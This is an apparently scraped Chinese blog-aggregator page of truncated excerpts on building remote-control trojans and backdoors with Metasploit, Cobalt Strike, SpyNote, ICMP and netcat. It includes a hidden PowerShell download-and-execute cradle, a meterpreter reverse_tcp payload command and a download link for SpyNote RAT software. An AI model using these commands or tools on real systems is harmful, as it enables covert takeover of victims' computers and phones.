首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
kali生成远控payload
2024-11-01
使用kali生成远控payload
kali linux中的metasploit框架是优秀的渗透框架之一,今天记载一下使用kali生成windows远控木马的过程 生成payload使用的工具是MSFVenom,我们输入msfvenom之后会显示出它的基本参数 在这里我们没有设置参数,所以第一行出现了一个错误 这里我们主要讲windows下payloads的生成和利用,在第五行里面我们看到已经给出了一个生成payload的例子,这个例子生成的就是windwos下的木马 即: Example: /usr/bin/msfvenom -
【原创】利用Office宏实现powershell payload远控
本文将演示使用Veil-Evasion生成远控所需要的payload以及监听器,然后使用MacroShop生成payload 相关的VBA代码,最后演示将VBA代码写入.doc文本文档的宏中. 环境:虚拟机_Kali 依赖:Veil-Evasion.MacroShop 0x00 安装Veil-Evasion.MacroShop (老鸟可绕过) 本例采用git 安装. 打开Veil-Evasion的github页面:https://github.com/Veil-Framewor
利用kage把msf变成可视化远控平台
项目下载https://github.com/WayzDev/Kage/releases 这里用kali系统演示 1,先下载kage: 2,右击给予执行权限 3,启动msf msfconsole -q -x 'load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msfuser Pass=msfpass' 注意:如果kage跟msf不在一个机器上,上面命令如果不带serverhost参数,则只容许127.0.0.1链接我们也那么可以通过 msf
python+msf 制作 windows远控
最近分析的一个远控,后发现是meterpreter rever http shell,文件是个打包的python(打包成exe),感谢wstone的指导~ 创建dll ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 -t dll X > /tmp/sc.dll python main.py import sys, os import shutil import time import ctyp
CS远控
Cobaltstrike 一.基础使用 ./teamserver 192.168.43.224 123456 启动服务器端 在windows下的链接 双击bat文件即可 在linux下 ./start.sh 让目标机器链接上teamserver 1.设置好监听器 2.生成攻击载荷 url它是个文件路径,就是让目标(受害者)通过地址下载恶意脚本 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstr
redis使用ssh密钥远控靶机
首先说明一下我们的实验目的,我们这个实验需要利用一种公有密码,将公有密钥写入要攻击的服务器的redis数据库,然后使用我们自己的私钥进行远控肉鸡的操作. 实验环境:centos7(靶机,版本无太大要求,重点是靶机需要开启22端口的ssh服务) kali(攻击方) (1)在centos7内安装redis数据库,并以root权限启动redis(安装步骤请参照我写的上一篇 https://www.cnblogs.com/cute-puli/p/10853300.html ) 看到饼状图代表redi
cobaltstrike进行局域网远控
用cobaltstrike进行局域网远控 cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端. 实验原理:用cobaltstrike生成木马,发送到目标主机上,双击运行后反向链接到cobaltstrike监听的端口,实现远程控制 本次实验的cobaltstrike安装在kali中 点开文件 3.按住shift,右击黑色区域,点击"在终端打开",sudo su,进入超级管理员权限 4.首先给文件
Python3实现ICMP远控后门(中)之“嗅探”黑科技
ICMP后门 前言 第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 在上两篇文章中,详细讲解了ICMP协议,同时实现了一个具备完整功能的ping工具,完整的代码发布在https://github.com/qiyeboy/LuLunZi/blob/master/NetWork/ping.py中.本次讲的是嗅探,为什么要讲嗅探呢?和ICMP后门有什么关系呢?本篇的干货有点多... 第一节 ICMP后门结构 设计的ICMP后门采用的是典型的C
Python3实现ICMP远控后门(下)之“Boss”出场
ICMP后门 前言 第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 第三篇:Python3实现ICMP远控后门(中)之"嗅探"黑科技 熬到最后一篇了,本系列的Boss要出场了,实现了一个有意思的ICMP后门,暂时使用pyinstaller打包成了一个win32和64版本,如下图所示. 在前几篇的基础上,本篇扩展的知识点为数据的加密和解密,以及shell的调用,并最终生成一个可用的ICMP后门.本篇总共分为五节,需要花费5分钟时
用nc+简单bat/vbs脚本+winrar制作迷你远控后门
前言 某大佬某天和我聊起了nc,并且提到了nc正反向shell这个概念. 我对nc之前的了解程度仅局限于:可以侦听TCP/UDP端口,发起对应的连接. 真正的远控还没实践过,所以决定写个小后门试一试. 1.NC.正向Shell.反向Shell介绍 1.1 什么是nc: nc是netcat的简写,就是一个简单.可靠的网络工具.当然因为某些奇怪原因,已经被各大杀毒轮番轰炸.原因就和下文所述有关. 1.2 nc的作用: (1)实现任意TCP/UDP端口的侦听,nc可以作为服务器端以TCP或UDP方式侦
2019-9-11:渗透测试,Kill远控软件,初接触
初步使用Kill远控软件,使win7靶机被远控 该文章仅供学习,利用方法来自网络文章,仅供参考 1,打开运行Kill,选择系统设置,设置监听端口,通讯密码,点击保存设置 2,点击服务生成,上线参数,设置服务端ip地址,端口设置为之前本地监听的端口,点击测试,提示“链接成功”就是设置正常 3,打开远控软件目录下的,hfs服务端软件 4,将左侧默认文件都移除掉,右键单击,选择 移除即可 5,在虚拟文件系统下的主页图标,右键单击,点击添加文件,将远控软件hfs服务文件夹下的consy21.dll
手机远控SpyNote教程+软件
链接:https://pan.baidu.com/s/1q0VVSxK0DCJk2VnOg5RgOA 提取码:1okp 生成一个小马界面.可以看到,和以往的远控一样,做好端口映射,定制图标,包名,版本号等等,还可以和别的apk文件捆绑, 点击imei,弹出一个对话框.点击[tool p] 即可. 然后等一段时间,电脑桌面上你会看见这个界面. 1.可以生成一个APK,绑定在被控手机的任何APP上2.可在电脑端控制手机,包括浏览.传输.删除文件等6.麦克风监听7.GPS定位8.APP管理
远程控制(远控Bin)
一.概念 控制端:运行在攻击者的电脑中,负责控制其他肉鸡: 被控制端:需要去生成,运行在肉鸡上,木马病毒 二.使用远控Bin工具实现内网远程控制 Step1:打开Kill.exe,点击系统设置,修改监听端口为9999,设置通讯密码: Step2:打开./Plugins/hfs2_3b287/hfs.exe,将虚拟文件目录中的东西全部移除: Step3:右键添加文件,将Consys21.dll添加进去:点击在浏览器中访问. Step4:将Consys21.dll的地址复制,打开kill.exe的服
【逆向&编程实战】Metasploit中的安卓载荷凭什么吊打SpyNote成为安卓端最强远控
文章作者:MG1937 QQ:3496925334 CNBLOG:ALDYS4 未经许可,禁止转载 前言 说起SpyNote大家自然不陌生,这款恶意远控软件被利用在各种攻击场景中 甚至是最近也捕获到了利用"新冠病毒"进行传播的SpyNote样本 方便的Gui操作页面,行云流水的攻击过程... 但它真有那么优秀以至于无懈可击吗? 著名渗透测试框架Metasploit中的安卓载荷和它相比到底如何呢? 文章目录 SpyNote运行流程分析 Payload加载流程比对 APK注入流程比对 灵活
基于gRPC编写golang简单C2远控
概述 构建一个简单的远控木马需要编写三个独立的部分:植入程序.服务端程序和管理程序. 植入程序是运行在目标机器上的远控木马的一部分.植入程序会定期轮询服务器以查找新的命令,然后将命令输出发回给服务器. 管理程序是运行在用户机器上的客户端,用于发出实际的命令. 服务端则负责与植入程序和客户端的交互,接收客户端的指令,并在植入程序请求时,将命令发送给植入程序,随后将植入程序发送来的结果传递给客户端. gRPC 这里通过gRPC构建所有的网络交互. 关于gRPC.Protobuf.protoc请参考h
WPF-控件-DataTemplate生成的控件
<Window x:Class="由DataTemplate生成的控件.MainWindow" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:local="clr-namespace:由DataTemplate生成的控件&qu
WPF-控件-ControlTemplate生成的控件
<Window x:Class="由ControlTemplate生成的控件.MainWindow" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" Title="MainWindow" Height="350"
Swift - 生成各种控件的工厂类(包含标签,按钮,输入框等)
在iOS开发中,页面里有时会大量的用到一些控件,如果要一个个单独创建再设置样式的话就显得很麻烦.我们可以创建一个生成各种控件的工厂类,这样在需要的时候调用下就可以了. 下面以一个自定义的工厂类为例,其中提供了文本标签,按钮,文本输入框,分段单选控件的生成,效果图如下: 工厂类:ViewFactory.swift 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
Python3实现ICMP远控后门(上)
这几天一直在研究远控木马的一些通信协议,比如TCP,UDP,ICMP,DNS,HTTP等等,对于TCP,UDP这两种就不讲解了,因为太常见了. 大家可能对采用ICMP,DNS的木马不是很熟悉,其实这两种协议在木马通信上很流行,特点是比较隐蔽,不容易被封锁.HTTP协议主要是用在以大型网站作为C&C服务器的场景,例如之前就有使用twitter作为 C&C服务器. 本次就以ICMP协议进行分析,并使用Python开发出一个ICMP远控后门,在写这篇文章的之前,我感觉大家对ICMP协议肯定不会很
Python3实现ICMP远控后门(上)_补充篇
ICMP后门(上)补充篇 前言 在上一篇文章Python3实现ICMP远控后门(上)中,我简要讲解了ICMP协议,以及实现了一个简单的ping功能,在文章发表之后,后台很多朋友留言,说对校验和的计算不是很了解,实现的ping功能仅实现了发送,接收没有实现,一个完整ping如何实现等等.本来对于ICMP后门写三篇文章的,但是对大家的疑惑临时开辟了一个补充篇,对ICMP协议校验方式,以及实现一个完整功能的ping给大家进行详细的讲解. 第一节 ICMP协议校验和 对于校验和的计算,我对写校验和的代码
热门专题
sqlmap怎么提权
power edge r320 安装esxi
EBS WIP移动 Sql
JSp处理textarea换行,如何把回车变成<br>
linux数据泵导入dmp文件
切换下拉框 输入框清空
delphi utf8 转 gbk
itextrenderer设置纸张大小
reportng排除依赖testng
cd-text编码cue
git提交到一半关闭
IIS发布后其他电脑打不开
理想汽车如何使用系统开发生命周期
百度 poi 只能抓取100多条
v-for div显示不出来
left4dead2 配置文件
go webapi框架 gin
xposed 打印类方法
.net调用http接口post
类型date转成varchar